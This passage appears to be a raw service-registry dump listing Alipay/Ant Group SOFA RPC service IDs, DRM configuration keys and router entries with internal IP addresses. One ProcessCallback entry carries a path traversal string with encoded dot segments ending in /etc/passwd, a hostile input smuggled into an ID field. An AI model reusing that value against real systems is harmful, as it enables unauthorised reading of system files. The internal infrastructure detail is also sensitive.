D#@#SOFA","com.alipay.antinvoice.biz.flow.service.isvorder.InvocieApplyCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.saction.AuthSactionFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.service.facade.AccountTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.wealthdecisionsys.facade.AlarmRobotInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.240.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.232.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:instpayAssetConsultService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.poscoreTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudprovision:name=com.alipay.cloudprovision.conf.requestconfig.useCommonTls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acgotonecore.facade.service.TemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecquery.common.service.drawndn.DrawndnInfoBillQueryFacade:1.0:drawndnInfoBillQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.BadcaseOperateMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.sql.service.RelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.api.BindingAuthService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.loadcenter.common.service.openapi.RecordServiceApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.webx.session.drm.SessionLogDrm.sessionDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.4.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acctrans.facade.api.acctrans.AcctransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.SwitchCoreService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair_dest.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:psbp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.DepositQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:infosectask@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcmerchantprod.facade.hbpoint.HbPointSummaryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.invite.InviteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:consumeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.ConvertorClassloaderSwitcher.meta,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.agdsccalipay:name=com.alipay.agdscc.common.service.facade.selleradmitcache.SellerAdmitCacheSwitch.cacheVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.debittrans.service.facade.accounttrans.api.AccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:frdataaccess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaocore.common.service.facade.api.BaitiaoPledgeChangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.121#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findecision.common.service.facade.identify.FinIdentifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthserviceprod.common.service.facade.api.HealthServiceCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.appinstancegroup.AppInstanceGroupFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.payacceptance.common.service.api.PaymentServiceFacade:1.0:payacceptance_ccmc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.api.RegisterInstItemService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.zcache.tbase.riskmngPunishcenterTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:rdeclarecenter_reveal_report_audit_processCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrecon.api.InsReconScriptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcreditdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.core.service.ldc.drm.CZoneCacheConfigDRMImpl.logDetailEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.26.111#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/����/����/����/����/����/����/����/����/����/����/etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.6.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iaassettrans.facade.common.astconfig.api.AstconfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.knowledge.facade.BasicKnowledgeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.access.TransferAccessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:zmcreditledger@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.metadata.IaasConnMetadataRegistryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Notify_SubscriptionInfo_BindingTP_DEFAULT_UNIFORM_EVENT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkmerchantprod.common.service.facade.applet.pay.AppletPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.paymentMerchantQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_S_STMTCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinsnsprod.biz.service.gw.news.api.channelnews.NewsListGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.222.250#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.zoloz.zhub.smileface.SmileFaceDeviceKeyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finbatch.biz.service.impl.drm.FinbatchCommonDRM.notifyInstInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mnotify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cif:name=com.alipay.cif.client.drm.ServiceInvokeReportConfigSwitch.enabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.guardianQueueMax,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.darwin:name=com.alipay.darwin.sdk.config.oss.bucket,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.topic.TopicRelatedContentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.252.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_MSERVICESINSPECT_MSERVICESINSPECT-SIMPLEAIG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.meta.MetaStorageHandlerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.view.PublicViewOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.rpc.common.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.promoprod.common.service.facade.DivideUpBonusConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoInsPolicyFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:businessProfileCreateProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmngcore.common.service.facade.api.EntityServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mytradeprod.common.service.facade.BankAccountApprovalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.mall.homepage.MallItemsListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbsalescenter.common.service.facade.trade.GiftGoldSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.engine.common.coordinator.service.ConfigLoadService:1.0:fininsightcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.shop.triple.TripleShopFollowService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftCrowdConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:pointmngTaskCenterVoucherCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.120.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acccenter.common.service.facade.doc.CollectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.service.facade.McenterFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bumonitor.risk.PubRiskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcontentprod.facade.service.dynamic.MaterialManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyopt.common.service.facade.api.ParamClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.fininfo.biz.service.impl.drm.GrayCompatibilityConfigDrm.returnIdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfinsight.service.api.excptsis.DrilldownIndicatorCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ialicore.irouteclient.elastic.api.ElasticService:1.0:icardcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:customscenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.aipContractIdWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_F_IINNERTRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fintradeguard.biz.money.core.LmbMoneyFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.FreezeReceiptService:1.0:paycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fintranscore.common.service.facade.trans.FinPurchaseFacade:1.0:dqtranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_INSMARKETINGCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.dataqualitytestsvr.flowtestfacade.facade.TraceJobServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianliQueryConfigFacade:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.biz.api.manager.ApiDemoManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bbccore.facade.datacollect.BbcDataCollectConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:personalprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promohelix.common.service.facade.api.roster.RosterLibOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:publicDomain_agdsdatahub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerBaseInfoMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.health.hyb.platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.clause.ShareHolderClauseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-girisk-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.exriskcenter.common.service.facade.api.mng.TaskTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedOptionalDepositDailyLimitAmtProcessCallBackFacadeImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.96.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.afwrobottwa:name=com.alipay.afwrobottwa.emergency.disableFieldVideo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstm.common.service.facade.mart.facade.AmTagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.inspect.InspectManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.prod.common.service.inner.facade.familycard.FamilyCardInnerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:messagefusion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.diag.common.service.facade.EsFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileha.core.service.antha.AnthaSentiAlarmDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.commonagentfund.api.CaftransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@finstore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.pcreditmarket.support.PcmCmdSupportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.asr.dataservice.client.service.StandardStoreReadService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:icontrol@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayAbilityDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmq.common.service.facade.MessageConsumeService:1.0:mcomment@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_OFFLINE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.antfinancial.antchain.cloud.endpoint.facade.ProduceTraceabilityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cfmng:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.facade.api.shop.xspace.XSpaceShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:mockUniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.home.rpc.facade.HelpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.common.ipromo.mobilerpc.facade.service.UserPayRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.manage.facade.GroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MFRONTGW#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fcdatalab.common.service.facade.service.DxAistudioServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.facade.NormalReleaseServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instriskcenter.facade.api.InstCreditFormulaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.precheck.GenericBeanPreCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.234.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofabootwebdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.179.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.UserControlRightQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FPORGASSETNET#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.101.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acorchestracore.endpoint.sofarest.ServiceContainerRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.facade.StatusNotifyService:1.0:pushcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthcore.common.service.facade.api.account.HealthAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmobile.servie.facade.api.CardContentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.ecf.api.EcftransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sdabombardier.common.service.facade.product.IotProductPriceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditchannel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.SelfCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.service.facade.ldc.AlipassPresentLDCFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.BriefManagementUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:openhome_generalModifyAppInfoCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.direct.retry.DirectHandleRetryCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.PrepaidTemplateRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secdatacontext.common.facade.spi.AssetsMetaAccessSpi:1.0:vEvent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igopcore.common.service.facade.api.sandbox.SandboxQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdeclarecenter.facade.service.DeclareDataBackFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.antforest.AntforestMrchTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.monitor.UserMonitorStatisticQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.api.bizroute.BusinessRuleServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycap.common.service.facade.adapt.CsWorkTaskManageService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprodapicore.endpoint.rest.ProdApiSpecRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.148.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.fundprod.facade.FundUserLoyaltyPointsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsmp.common.service.facade.privilege.service.v2.MarkServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_MQ_TEST_3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.aliminiabilityprod.facade.api.AnalyseTaskOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.holderIndexSpNoStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditsentry.facade.toolplatform.ComponentDebugFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.signTransferCodeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.runtimedatasrcmng.common.service.facade.api.patrol.record.PatrolRecordQueryFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.afsc.common.service.assistinvestigate.core.AssistMasterQueryTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.daemon.facade.InsTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.notify.OrderLinkNotifyOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fapquanthub.core.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:aircoreservice@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeprod.fund.facade.api.YebTransferInFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:mmm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finbatch.finreconSequenceDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.MerchantInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_FILE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.crmhome.common.service.facade.api.shop.xspace.XSpaceShopQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw.t380.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_FINANCE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementRzoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ANTSCHEDULER_SERVERLESS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbrecruit.common.service.facade.recruit.query.RecruitInviteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bis.common.service.facade.papers.PapersIDCardAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.common.service.facade.query.SchedulerQueryFacade:1.0:ischeduler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmportal.common.service.facade.VideoRenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bk.compass.facade.api.fundflow.QueryActualEntryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.MerchantCampManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.chips.api.ChiptransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.158.112#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.execute.OpsChngTraceFacade:1.0:opscloudflow@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcloanbenefit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secur